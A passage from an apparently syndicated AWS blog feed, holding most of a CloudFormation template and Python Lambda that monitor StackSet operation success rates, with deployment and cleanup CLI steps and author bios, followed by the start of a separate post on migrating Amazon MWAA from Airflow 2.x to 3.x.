          Value: StackSetMonitor-Private-Subnet-1
        - Key: Purpose
          Value: Private subnet for StackSet Monitor Lambda

  PrivateSubnet2:
    Type: AWS::EC2::Subnet
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      CidrBlock: 10.0.2.0/24
      AvailabilityZone: !Select [1, !GetAZs '']
      Tags:
        - Key: Name
          Value: StackSetMonitor-Private-Subnet-2
        - Key: Purpose
          Value: Private subnet for StackSet Monitor Lambda

  PrivateRouteTable1:
    Type: AWS::EC2::RouteTable
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      Tags:
        - Key: Name
          Value: StackSetMonitor-Private-RT-1

  PrivateRouteTable2:
    Type: AWS::EC2::RouteTable
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      Tags:
        - Key: Name
          Value: StackSetMonitor-Private-RT-2

  PrivateSubnet1RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Condition: CreateVPC
    Properties:
      RouteTableId: !Ref PrivateRouteTable1
      SubnetId: !Ref PrivateSubnet1

  PrivateSubnet2RouteTableAssociation:
    Type: AWS::EC2::SubnetRouteTableAssociation
    Condition: CreateVPC
    Properties:
      RouteTableId: !Ref PrivateRouteTable2
      SubnetId: !Ref PrivateSubnet2

  # VPC Endpoints for AWS Services (no internet access needed)
  CloudFormationVPCEndpoint:
    Type: AWS::EC2::VPCEndpoint
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      ServiceName: !Sub com.amazonaws.${AWS::Region}.cloudformation
      VpcEndpointType: Interface
      SubnetIds:
        - !Ref PrivateSubnet1
        - !Ref PrivateSubnet2
      SecurityGroupIds:
        - !Ref VPCEndpointSecurityGroup
      PrivateDnsEnabled: true
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal: '*'
            Action:
              - cloudformation:ListStackSets
              - cloudformation:ListStackSetOperations
              - cloudformation:ListStackInstances
              - cloudformation:DescribeStackInstance
              - cloudformation:DescribeStacks
              - cloudformation:GetTemplate
            Resource: '*'

  CloudWatchVPCEndpoint:
    Type: AWS::EC2::VPCEndpoint
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      ServiceName: !Sub com.amazonaws.${AWS::Region}.monitoring
      VpcEndpointType: Interface
      SubnetIds:
        - !Ref PrivateSubnet1
        - !Ref PrivateSubnet2
      SecurityGroupIds:
        - !Ref VPCEndpointSecurityGroup
      PrivateDnsEnabled: true
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal: '*'
            Action:
              - cloudwatch:PutMetricData
            Resource: '*'

  SNSVPCEndpoint:
    Type: AWS::EC2::VPCEndpoint
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      ServiceName: !Sub com.amazonaws.${AWS::Region}.sns
      VpcEndpointType: Interface
      SubnetIds:
        - !Ref PrivateSubnet1
        - !Ref PrivateSubnet2
      SecurityGroupIds:
        - !Ref VPCEndpointSecurityGroup
      PrivateDnsEnabled: true
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal: '*'
            Action:
              - sns:Publish
            Resource: '*'

  EventsVPCEndpoint:
    Type: AWS::EC2::VPCEndpoint
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      ServiceName: !Sub com.amazonaws.${AWS::Region}.events
      VpcEndpointType: Interface
      SubnetIds:
        - !Ref PrivateSubnet1
        - !Ref PrivateSubnet2
      SecurityGroupIds:
        - !Ref VPCEndpointSecurityGroup
      PrivateDnsEnabled: true
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal: '*'
            Action:
              - events:PutEvents
            Resource: '*'

  LogsVPCEndpoint:
    Type: AWS::EC2::VPCEndpoint
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      ServiceName: !Sub com.amazonaws.${AWS::Region}.logs
      VpcEndpointType: Interface
      SubnetIds:
        - !Ref PrivateSubnet1
        - !Ref PrivateSubnet2
      SecurityGroupIds:
        - !Ref VPCEndpointSecurityGroup
      PrivateDnsEnabled: true
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal: '*'
            Action:
              - logs:CreateLogGroup
              - logs:CreateLogStream
              - logs:PutLogEvents
            Resource: '*'

  SQSVPCEndpoint:
    Type: AWS::EC2::VPCEndpoint
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      ServiceName: !Sub com.amazonaws.${AWS::Region}.sqs
      VpcEndpointType: Interface
      SubnetIds:
        - !Ref PrivateSubnet1
        - !Ref PrivateSubnet2
      SecurityGroupIds:
        - !Ref VPCEndpointSecurityGroup
      PrivateDnsEnabled: true
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal: '*'
            Action:
              - sqs:SendMessage
            Resource: '*'

  STSVPCEndpoint:
    Type: AWS::EC2::VPCEndpoint
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      ServiceName: !Sub com.amazonaws.${AWS::Region}.sts
      VpcEndpointType: Interface
      SubnetIds:
        - !Ref PrivateSubnet1
        - !Ref PrivateSubnet2
      SecurityGroupIds:
        - !Ref VPCEndpointSecurityGroup
      PrivateDnsEnabled: true
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal: '*'
            Action:
              - sts:AssumeRole
              - sts:GetCallerIdentity
              - sts:AssumeRoleWithWebIdentity
            Resource: '*'

  # Security Group for Lambda function
  LambdaSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: Security group for StackSet Monitor Lambda function
      VpcId: !If
        - CreateVPC
        - !Ref StackSetMonitorVPC
        - !Ref VpcId
      SecurityGroupEgress:
        - IpProtocol: tcp
          FromPort: 443
          ToPort: 443
          CidrIp: 10.0.0.0/16
          Description: HTTPS to VPC Endpoints
        - IpProtocol: tcp
          FromPort: 53
          ToPort: 53
          CidrIp: 10.0.0.0/16
          Description: DNS TCP to VPC for name resolution
        - IpProtocol: udp
          FromPort: 53
          ToPort: 53
          CidrIp: 10.0.0.0/16
          Description: DNS UDP to VPC for name resolution
      Tags:
        - Key: Name
          Value: StackSetMonitor-Lambda-SG
        - Key: Purpose
          Value: Security group for StackSet Monitor Lambda

  VPCEndpointSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Condition: CreateVPC
    Properties:
      GroupDescription: Security group for VPC Endpoints
      VpcId: !Ref StackSetMonitorVPC
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 443
          ToPort: 443
          SourceSecurityGroupId: !Ref LambdaSecurityGroup
          Description: HTTPS from Lambda security group
        - IpProtocol: tcp
          FromPort: 53
          ToPort: 53
          SourceSecurityGroupId: !Ref LambdaSecurityGroup
          Description: DNS TCP from Lambda security group
        - IpProtocol: udp
          FromPort: 53
          ToPort: 53
          SourceSecurityGroupId: !Ref LambdaSecurityGroup
          Description: DNS UDP from Lambda security group
      SecurityGroupEgress:
        - IpProtocol: tcp
          FromPort: 443
          ToPort: 443
          CidrIp: 10.0.0.0/16
          Description: HTTPS outbound within VPC
        - IpProtocol: tcp
          FromPort: 53
          ToPort: 53
          CidrIp: 10.0.0.0/16
          Description: DNS TCP outbound within VPC
        - IpProtocol: udp
          FromPort: 53
          ToPort: 53
          CidrIp: 10.0.0.0/16
          Description: DNS UDP outbound within VPC
      Tags:
        - Key: Name
          Value: StackSetMonitor-VPCEndpoint-SG
        - Key: Purpose
          Value: Security group for VPC Endpoints

  # Dead Letter Queue for Lambda function
  StackSetMonitorDLQ:
    Type: AWS::SQS::Queue
    DeletionPolicy: Delete
    UpdateReplacePolicy: Delete
    Properties:
      QueueName: StackSetMonitor-DLQ
      MessageRetentionPeriod: 1209600  # 14 days
      KmsMasterKeyId: alias/aws/sqs
      Tags:
        - Key: Purpose
          Value: Dead Letter Queue for StackSet Monitor Lambda

  StackSetAlertsTopic:
    Type: AWS::SNS::Topic
    Properties: 
      TopicName: StackSetAlerts
      DisplayName: StackSet Monitoring Alerts
      KmsMasterKeyId: alias/aws/sns
  
  StackSetLogGroup:
    Type: AWS::Logs::LogGroup
    DeletionPolicy: Delete
    UpdateReplacePolicy: Delete
    Properties: 
      LogGroupName: /aws/cloudformation/stacksets
      RetentionInDays: 30
      KmsKeyId: !GetAtt LogsKMSKey.Arn

  LambdaLogGroup:
    Type: AWS::Logs::LogGroup
    DeletionPolicy: Delete
    UpdateReplacePolicy: Delete
    Properties:
      LogGroupName: /aws/lambda/StackSetMonitor
      RetentionInDays: 30
      KmsKeyId: !GetAtt LogsKMSKey.Arn
  
  StackSetMonitoringDashboard:
    Type: AWS::CloudWatch::Dashboard
    Properties:
      DashboardName: StackSetMonitoring
      DashboardBody: !Sub |
        {
          "widgets": [
            {
              "type": "metric",
              "width": 24,
              "height": 8,
              "properties": {
                "metrics": [
                  [ "StackSetMonitoring", "SuccessRate", "StackSetName", "${StackSetName}" ]
                ],
                "region": "${AWS::Region}",
                "title": "StackSet Operations",
                "period": 300,
                "stat": "Average"
              }
            },
            {
              "type": "log",
              "width": 24,
              "height": 6,
              "properties": {
                "query": "SOURCE '/aws/lambda/StackSetMonitor' | fields @timestamp, @message\n| sort @timestamp desc\n| limit 20",
                "region": "${AWS::Region}",
                "title": "Latest StackSet Monitor Logs",
                "view": "table"
              }
            }
          ]
        }
  
  # Consolidated rule to catch ALL StackSet events for comprehensive monitoring
  AllStackSetOperationsRule:
    Type: AWS::Events::Rule
    Properties:
      Name: AllStackSetOperationsRule
      Description: "Rule for monitoring all CloudFormation StackSet operations with failure notifications"
      EventPattern: {source: ["aws.cloudformation"], detail-type: ["CloudFormation StackSet Operation Status Change"]}
      State: ENABLED
      Targets:
        - Id: ProcessAllEvents
          Arn: !GetAtt StackSetMonitorLambda.Arn
        - Id: NotifyFailure
          Arn: !Ref StackSetAlertsTopic
          InputTransformer:
            InputPathsMap:
              "stackSetId": "$.detail.stack-set-id"
              "operationId": "$.detail.operation-id"
              "status": "$.detail.status"
              "time": "$.time"
            InputTemplate: '"StackSet Event: ID: <stackSetId>, Op: <operationId>, Status: <status>, Time: <time>"'

  StackSetMonitorLambda:
    Type: AWS::Lambda::Function
    DependsOn: LambdaLogGroup
    Properties:
      FunctionName: StackSetMonitor
      Handler: index.lambda_handler
      Role: !GetAtt StackSetMonitorRole.Arn
      Runtime: python3.12
      Timeout: 300
      MemorySize: 512
      ReservedConcurrentExecutions: 1
      DeadLetterConfig:
        TargetArn: !GetAtt StackSetMonitorDLQ.Arn
      VpcConfig:
        SecurityGroupIds: !If
          - HasCustomSecurityGroups
          - !Ref SecurityGroupIds
          - - !Ref LambdaSecurityGroup
        SubnetIds: !If
          - CreateVPCAndSubnets
          - - !Ref PrivateSubnet1
            - !Ref PrivateSubnet2
          - !Ref SubnetIds
      KmsKeyArn: !GetAtt LogsKMSKey.Arn
      Code:
        ZipFile: |
          import boto3
          import json
          import os
          import logging
          import time
          import datetime
          from typing import Dict, Any, Optional
          
          # Custom JSON encoder to handle datetime objects
          class DateTimeEncoder(json.JSONEncoder):
              def default(self, obj):
                  if isinstance(obj, datetime.datetime):
                      return obj.isoformat()
                  return super().default(obj)
          
          # Set up logging with more details
          logger = logging.getLogger()
          logger.setLevel(logging.INFO)
          
          # Log initialization to verify Lambda is loading correctly
          print("StackSetMonitor Lambda initializing...")
          
          def validate_event(event: Dict[str, Any]) -> bool:
              """Validate the incoming event structure"""
              if not isinstance(event, dict):
                  logger.error("Event must be a dictionary")
                  return False
              
              # If it's an EventBridge event, validate required fields
              if 'detail' in event:
                  detail = event.get('detail', {})
                  if not isinstance(detail, dict):
                      logger.error("Event detail must be a dictionary")
                      return False
                  
                  # Validate StackSet event structure
                  if 'stack-set-id' in detail:
                      stack_set_id = detail.get('stack-set-id')
                      if not isinstance(stack_set_id, str) or not stack_set_id.strip():
                          logger.error("stack-set-id must be a non-empty string")
                          return False
                      
                      # Validate operation-id if present
                      operation_id = detail.get('operation-id')
                      if operation_id is not None and not isinstance(operation_id, str):
                          logger.error("operation-id must be a string if provided")
                          return False
                      
                      # Validate status if present
                      status = detail.get('status')
                      if status is not None and not isinstance(status, str):
                          logger.error("status must be a string if provided")
                          return False
              
              return True
          
          def validate_context(context: Any) -> bool:
              """Validate the Lambda context object"""
              if context is None:
                  logger.error("Context cannot be None")
                  return False
              
              # Check for required context attributes
              required_attrs = ['function_name', 'function_version', 'invoked_function_arn', 'memory_limit_in_mb']
              for attr in required_attrs:
                  if not hasattr(context, attr):
                      logger.error(f"Context missing required attribute: {attr}")
                      return False
              
              return True
          
          def sanitize_string(value: str, max_length: int = 255) -> str:
              """Sanitize and truncate string inputs"""
              if not isinstance(value, str):
                  return str(value)[:max_length]
              return value.strip()[:max_length]
          
          def lambda_handler(event: Dict[str, Any], context: Any) -> Dict[str, Any]:
              """Main Lambda handler function for StackSet monitoring with input validation"""
              
              # Input validation
              if not validate_event(event):
                  return {
                      "statusCode": 400,
                      "body": json.dumps({
                          "status": "error",
                          "message": "Invalid event structure"
                      }, cls=DateTimeEncoder)
                  }
              
              if not validate_context(context):
                  return {
                      "statusCode": 400,
                      "body": json.dumps({
                          "status": "error",
                          "message": "Invalid context object"
                      }, cls=DateTimeEncoder)
                  }
              
              # Log the validated event for debugging
              logger.info(f"Event received: {json.dumps(event, cls=DateTimeEncoder)}")
              logger.info(f"Function: {context.function_name}, Version: {context.function_version}")
              
              try:
                  cf = boto3.client('cloudformation')
                  cw = boto3.client('cloudwatch')
                  
                  # Log that we're starting processing
                  logger.info(f"Starting StackSet monitoring at {time.time()}")
                  
                  # Check if this is an event from EventBridge
                  if 'detail' in event and 'stack-set-id' in event.get('detail', {}):
                      detail = event['detail']
                      stack_set_id = sanitize_string(detail['stack-set-id'])
                      operation_id = sanitize_string(detail.get('operation-id', 'N/A'))
                      status = sanitize_string(detail.get('status', 'N/A'))
                      
                      # Validate stack_set_id format
                      if not stack_set_id or len(stack_set_id) > 128:
                          logger.error(f"Invalid stack_set_id: {stack_set_id}")
                          return {
                              "statusCode": 400,
                              "body": json.dumps({
                                  "status": "error",
                                  "message": "Invalid stack_set_id format"
                              }, cls=DateTimeEncoder)
                          }
                      
                      # Log the StackSet operation with additional context
                      logger.info(f"Processing StackSet event - ID: {stack_set_id}, Op: {operation_id}, Status: {status}")
                      
                      # Extract stack set name from the ID
                      stack_set_name = stack_set_id.split('/')[-1] if '/' in stack_set_id else stack_set_id
                      stack_set_name = sanitize_string(stack_set_name, 128)
                      logger.info(f"Extracted StackSet name: {stack_set_name}")
                  
                  # Always gather metrics regardless of event type
                  # Get all active StackSets
                  stack_sets_response = cf.list_stack_sets(Status='ACTIVE')
                  stack_sets = stack_sets_response.get('Summaries', [])
                  
                  if not isinstance(stack_sets, list):
                      logger.error("Invalid response from list_stack_sets")
                      return {
                          "statusCode": 500,
                          "body": json.dumps({
                              "status": "error",
                              "message": "Invalid CloudFormation API response"
                          }, cls=DateTimeEncoder)
                      }
                  
                  logger.info(f"Found {len(stack_sets)} active StackSets")
                  
                  for stack_set in stack_sets:
                      if not isinstance(stack_set, dict) or 'StackSetName' not in stack_set:
                          logger.warning(f"Skipping invalid stack_set entry: {stack_set}")
                          continue
                      
                      stack_set_name = sanitize_string(stack_set['StackSetName'], 128)
                      logger.info(f"Processing StackSet: {stack_set_name}")
                      
                      try:
                          operations = cf.list_stack_set_operations(StackSetName=stack_set_name, MaxResults=5)
                          
                          # Validate operations response
                          if not isinstance(operations, dict):
                              logger.error(f"Invalid operations response for {stack_set_name}")
                              continue
                          
                          # Calculate success rate
                          successes = 0
                          operations_list = operations.get('Summaries', [])
                          
                          if not isinstance(operations_list, list):
                              logger.error(f"Invalid operations list for {stack_set_name}")
                              continue
                          
                          total_ops = len(operations_list)
                          logger.info(f"Found {total_ops} recent operations for {stack_set_name}")
                          
                          for op in operations_list:
                              if isinstance(op, dict) and op.get('Status') == 'SUCCEEDED':
                                  successes += 1
                          
                          success_rate = (successes / total_ops * 100) if total_ops > 0 else 100
                          
                          # Validate success_rate is within expected bounds
                          if not (0 <= success_rate <= 100):
                              logger.error(f"Invalid success_rate calculated: {success_rate}")
                              continue
                          
                          # Publish metrics to CloudWatch
                          cw.put_metric_data(
                              Namespace='StackSetMonitoring',
                              MetricData=[
                                  {'MetricName': 'SuccessRate', 'Value': success_rate, 
                                   'Dimensions': [{'Name': 'StackSetName', 'Value': stack_set_name}]}
                              ]
                          )
                          
                          logger.info(f"Published metrics for {stack_set_name}: Success Rate = {success_rate}%")
                      except Exception as e:
                          logger.error(f"Error processing StackSet {stack_set_name}: {str(e)}")
                  
                  return {
                      "statusCode": 200,
                      "body": json.dumps({
                          "status": "completed",
                          "message": f"Processed {len(stack_sets)} StackSets"
                      }, cls=DateTimeEncoder)
                  }
                  
              except Exception as e:
                  logger.error(f"Error in Lambda function: {str(e)}")
                  # Return a proper response even on error
                  return {
                      "statusCode": 500,
                      "body": json.dumps({
                          "status": "error",
                          "message": str(e)
                      }, cls=DateTimeEncoder)
                  }
  
  # Managed IAM Policies
  CloudFormationAccessPolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
      Description: 'Policy for CloudFormation and CloudWatch access for StackSet Monitor'
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Action:
              - cloudformation:ListStackSets
              - cloudformation:ListStackSetOperations
              - cloudformation:ListStackInstances
              - cloudformation:DescribeStackInstance
            Resource: 
              - !Sub "arn:${AWS::Partition}:cloudformation:${AWS::Region}:${AWS::AccountId}:stackset/*"
              - !Sub "arn:${AWS::Partition}:cloudformation:${AWS::Region}:${AWS::AccountId}:stackset-target/*"
          - Effect: Allow
            Action:
              - cloudwatch:PutMetricData
            Resource: "*"
            Condition:
              StringEquals:
                "cloudwatch:namespace": "StackSetMonitoring"
          - Effect: Allow
            Action:
              - sns:Publish
            Resource: !Ref StackSetAlertsTopic

  EventsAccessPolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
      Description: 'Policy for EventBridge access for StackSet Monitor'
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Action:
              - events:PutEvents
            Resource: !Sub "arn:${AWS::Partition}:events:${AWS::Region}:${AWS::AccountId}:event-bus/default"

  LogsAccessPolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
      Description: 'Policy for CloudWatch Logs access for StackSet Monitor'
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Action:
              - logs:CreateLogGroup
              - logs:CreateLogStream
              - logs:PutLogEvents
            Resource: 
              - !Sub "arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws/lambda/StackSetMonitor"
              - !Sub "arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws/lambda/StackSetMonitor:*"
              - !Sub "arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws/cloudformation/stacksets"
              - !Sub "arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws/cloudformation/stacksets:*"

  DLQAccessPolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
      Description: 'Policy for Dead Letter Queue access for StackSet Monitor'
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Action:
              - sqs:SendMessage
            Resource: !GetAtt StackSetMonitorDLQ.Arn

  StackSetMonitorRole:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal:
              Service: lambda.amazonaws.com
            Action: sts:AssumeRole
      ManagedPolicyArns:
        - arn:aws:iam::aws:policy/service-role/AWSLambdaVPCAccessExecutionRole
        - !Ref CloudFormationAccessPolicy
        - !Ref EventsAccessPolicy
        - !Ref LogsAccessPolicy
        - !Ref DLQAccessPolicy

  # Permissions for event rules to invoke Lambda
  AllOperationsRuleLambdaPermission:
    Type: AWS::Lambda::Permission
    Properties:
      FunctionName: !Ref StackSetMonitorLambda
      Action: lambda:InvokeFunction
      Principal: events.amazonaws.com
      SourceArn: !GetAtt AllStackSetOperationsRule.Arn
  
  # Using a one minute schedule for testing, but you can change this value
  StackSetMonitorSchedule:
    Type: AWS::Events::Rule
    Properties:
      Name: RegularStackSetMonitoring
      Description: "Triggers Lambda function every 1 minute to check StackSet operations"
      ScheduleExpression: "rate(1 minute)"
      State: ENABLED
      Targets:
        - Id: RunMonitor
          Arn: !GetAtt StackSetMonitorLambda.Arn
  
  ScheduleLambdaInvokePermission:
    Type: AWS::Lambda::Permission
    Properties:
      FunctionName: !Ref StackSetMonitorLambda
      Action: lambda:InvokeFunction
      Principal: events.amazonaws.com
      SourceArn: !GetAtt StackSetMonitorSchedule.Arn
  
  StackSetSuccessRateAlarm:
    Type: AWS::CloudWatch::Alarm
    Properties:
      AlarmDescription: "Alarm when StackSet operation success rate is low"
      MetricName: SuccessRate
      Namespace: "StackSetMonitoring"
      Statistic: Average
      Period: 300
      EvaluationPeriods: 3
      DatapointsToAlarm: 2
      Threshold: 80
      ComparisonOperator: LessThanThreshold
      AlarmActions: [!Ref StackSetAlertsTopic]
      Dimensions: [{Name: StackSetName, Value: !Ref StackSetName}]

Outputs:
  SNSTopicArn: 
    Description: The ARN of the SNS topic for alerts
    Value: !Ref StackSetAlertsTopic
  DashboardURL: 
    Description: URL to the CloudWatch Dashboard
    Value: !Sub https://console.aws.amazon.com/cloudwatch/home?region=${AWS::Region}#dashboards:name=StackSetMonitoring
  LambdaLogGroupName:
    Description: Name of the CloudWatch Log Group for Lambda logs
    Value: !Ref LambdaLogGroup
  DeadLetterQueueArn:
    Description: ARN of the Dead Letter Queue for Lambda function failures
    Value: !GetAtt StackSetMonitorDLQ.Arn
  DeadLetterQueueURL:
    Description: URL of the Dead Letter Queue for monitoring failed Lambda executions
    Value: !Ref StackSetMonitorDLQ
  TestLambdaCommand:
    Description: Command to manually test the Lambda function
    Value: !Sub "aws lambda invoke --function-name ${StackSetMonitorLambda} --payload '{}' response.json && cat response.json"
  LambdaFunctionArn:
    Description: ARN of the Lambda function configured with VPC
    Value: !GetAtt StackSetMonitorLambda.Arn
  LambdaSecurityGroupId:
    Description: Security Group ID created for the Lambda function
    Value: !Ref LambdaSecurityGroup
  VpcConfiguration:
    Description: VPC configuration summary for the Lambda function
    Value: !Sub 
      - "VPC: ${VpcId}, Subnets: ${SubnetList}, Security Groups: ${LambdaSecurityGroup}"
      - SubnetList: !Join [',', !Ref SubnetIds]

You need to run the following CLI command to deploy the CloudFormation stacks. You can change the ParameterValue of StackSetName“your-stackset-name” by the name of the StackSet you want to monitor. The default value is “security-baseline”. Your CLI profile should use region=“us-east-1“.

aws cloudformation create-stack --stack-name stackset-monitor --template-body file://StackSetMonitor.yml --parameters ParameterKey=StackSetName,ParameterValue="security-baseline" --capabilities CAPABILITY_IAM

AWS CLI to deploy the StackSetMonitor.yml CloudFormation template

The CLI output should look like the following:

{"StackId": "arn:aws:cloudformation:...."}

Here’s the expected output for the CloudFormation template:

StackSetMonitor Console output

StackSetMonitor Console output

And an example of Amazon CloudWatch Dashboard and Alarm screen:

Amazon CloudWatch Dashboard screenshot for StackSetMonitor stack to track StackSet operations success rate

Amazon CloudWatch Dashboard screenshot for StackSetMonitor stack to track StackSet operations success rate

Amazon CloudWatch Alarm screenshot for StackSetMonitor stack to track StackSet operations success rate

Amazon CloudWatch Alarm screenshot for StackSetMonitor stack to track StackSet operations success rate

SNS subscription setup involves retrieving the topic ARN from stack outputs and configuring notifications for email or SMS endpoints (below example CLI for email subscription):

aws sns subscribe --topic-arn $SNS_TOPIC_ARN --protocol email --notification-endpoint [email protected]

AWS CLI to subscribe to the topic providing the user email

Cost:

The estimated monthly expenses ranges between 5 and 15 USD depending on StackSet activity levels, with approximately 2,880 Lambda executions per day (each minute) under the default monitoring schedule.

The solution supports customization of monitoring frequency by modifying the ScheduleExpression from the default one-minute interval. The cost will decrease if the monitoring is less frequent.

Cleanup:

For cleanup, you can run the following command lines:

  • To cleanup the Stack Instances and StackSets created in the Core Deployment Strategies section:

aws cloudformation delete-stack-instances --stack-set-name security-baseline --deployment-targets OrganizationalUnitIds=ou-xxx --regions us-east-1 eu-west-1 --region us-east-1 --no-retain-stack

AWS CLI to delete the Stack Instances

You need to change the parameter OrganizationalUnitIds value with the name of the OU, the parameter regions with the list of regions where you want to delete your stack instances, and the value of the stack-set-name parameter (security-baseline, monitoring-baseline, balanced-deployment…).

Then you can delete the StackSet:

aws cloudformation delete-stack-set --stack-set-name security-baseline

AWS CLI to delete the StackSet

You can change the value of the stack-set-name parameter.

  • To cleanup the stackset-monitor stack

aws cloudformation delete-stack --stack-name stackset-monitor

AWS CLI to delete the stackset-monitor Stack

You can also remove any IAM roles/policies that you specifically created for this blog that you might not need anymore

Conclusion

Throughout this guide, we’ve explored the nuanced approaches to AWS CloudFormation StackSets deployments across large-scale environments. The key takeaways include:

  • Balance is Critical: Every deployment strategy requires careful consideration of the trade-offs between speed, safety, and scale based on your organizational needs.
  • Progressive Adoption Works: For most organizations, a progressive deployment approach with validation gates provides the optimal balance of safety and efficiency.
  • Organizational Context Matters: Enterprise, startup, and regulated industry patterns demonstrate that deployment strategies should be tailored to your specific business requirements and risk tolerance.
  • Monitoring is Essential: As organizations scale to hundreds of accounts, comprehensive monitoring becomes critical for maintaining visibility and ensuring compliance.

These different approaches will help you adopt the right strategy for your AWS CloudFormation Stacksets deployments in your AWS Organization.

You can now test these different approaches on your sandbox environment, before adapting them for your specific needs, in order to balance Speed, Safety and Scale to optimize your deployments.

Amar Meriche

Amar is a Sr Cloud Operations Architect at AWS in Paris. He helps his customers improve their operational posture through advocacy and guidance, and is an active member of the DevOps and IaC community at AWS. He’s passionate about helping customers use the various IaC tools available at AWS following best practices. When he’s not working with customers, Amar can be found on the mountain trails with his family or playing basketball with his team.

Idriss Laouali Abdou

Idriss is a Sr. Product Manager Technical for AWS Infrastructure-as-Code based in Seattle. He focuses on improving developer productivity through StackSets and CloudFormation Infrastructure provisioning experiences. Outside of work, you can find him creating educational content for thousands of students, cooking, or dancing.

Best practices for migrating from Apache Airflow 2.x to Apache Airflow 3.x on Amazon MWAA

Post Syndicated from Anurag Srivastava original https://aws.amazon.com/blogs/big-data/best-practices-for-migrating-from-apache-airflow-2-x-to-apache-airflow-3-x-on-amazon-mwaa/

Apache Airflow 3.x on Amazon MWAA introduces architectural improvements such as API-based task execution that provides enhanced security and isolation. Other major updates include a redesigned UI for better user experience, scheduler-based backfills for improved performance, and support for Python 3.12. Unlike in-place minor Airflow version upgrades in Amazon MWAA, upgrading to Airflow 3 from Airflow 2 requires careful planning and execution through a migration approach due to fundamental breaking changes.

This migration presents an opportunity to embrace next-generation workflow orchestration capabilities while providing business continuity. However, it’s more than a simple upgrade. Organizations migrating to Airflow 3.x on Amazon MWAA must understand key breaking changes, including the removal of direct metadata database access from workers, deprecation of SubDAGs, changes to default scheduling behavior, and library dependency updates. This post provides best practices and a streamlined approach to successfully navigate this critical migration, providing minimal disruption to your mission-critical data pipelines while maximizing the enhanced capabilities of Airflow 3.

Understanding the migration process

The journey from Airflow 2.x to 3.x on Amazon MWAA introduces several fundamental changes that organizations must understand before beginning their migration. These changes affect core workflow operations and require careful planning to achieve a smooth transition.

You should be aware of the following breaking changes:

  • Removal of direct database access – A critical change in Airflow 3 is the removal of direct metadata database access from worker nodes. Tasks and custom operators must now communicate through the REST API instead of direct database connections. This architectural change affects code that previously accessed the metadata database directly through SQLAlchemy connections, requiring refactoring of existing DAGs and custom operators.
  • SubDAG deprecation – Airflow 3 removes the SubDAG construct in favor of TaskGroups, Assets, and Data Aware Scheduling. Organizations must refactor existing SubDAGs to one of the previously mentioned constructs.
  • Scheduling behavior changes – Two notable changes to default scheduling options require an impact analysis:
    • The default values for catchup_by_default and create_cron_data_intervals changed to False. This change affects DAGs that don’t explicitly set these options.
    • Airflow 3 removes several context variables, such as execution_date, tomorrow_ds, yesterday_ds, prev_ds, and next_ds. You must replace these variables with currently supported context variables.
  • Library and dependency changes – A significant number of libraries change in Airflow 3.x, requiring DAG code refactoring. Many previously included provider packages might need explicit addition to the requirements.txt file.
  • REST API changes – The REST API path changes from /api/v1 to /api/v2, affecting external integrations. For more information about using the Airflow REST API, see Creating a web server session token and calling the Apache Airflow REST API.
  • Authentication system – Although Airflow 3.0.1 and later versions default to SimpleAuthManager instead of Flask-AppBuilder, Amazon MWAA will continue using Flask-AppBuilder for Airflow 3.x. This means customers on Amazon MWAA will not see any authentication changes.

The migration requires creating a new environment rather than performing an in-place upgrade. Although this approach demands more planning and resources, it provides the advantage of maintaining your existing environment as a fallback option during the transition, facilitating business continuity throughout the migration process.

Pre-migration planning and assessment

Successful migration depends on thorough planning and assessment of your current environment. This phase establishes the foundation for a smooth transition by identifying dependencies, configurations, and potential compatibility issues. Evaluate your environment and code against the previously mentioned breaking changes to have a successful migration.

Environment assessment

Begin by conducting a complete inventory of your current Amazon MWAA environment. Document all DAGs, custom operators, plugins, and dependencies, including their specific versions and configurations. Make sure your current environment is on version 2.10.x, because this provides the best compatibility path for upgrading to Amazon MWAA with Airflow 3.x.

Identify the structure of the Amazon Simple Storage Service (Amazon S3) bucket containing your DAG code, requirements file, startup script, and plugins. You will replicate this structure in a new bucket for the new environment. Creating separate buckets for each environment avoids conflicts and allows continued development without affecting current pipelines.

Configuration documentation

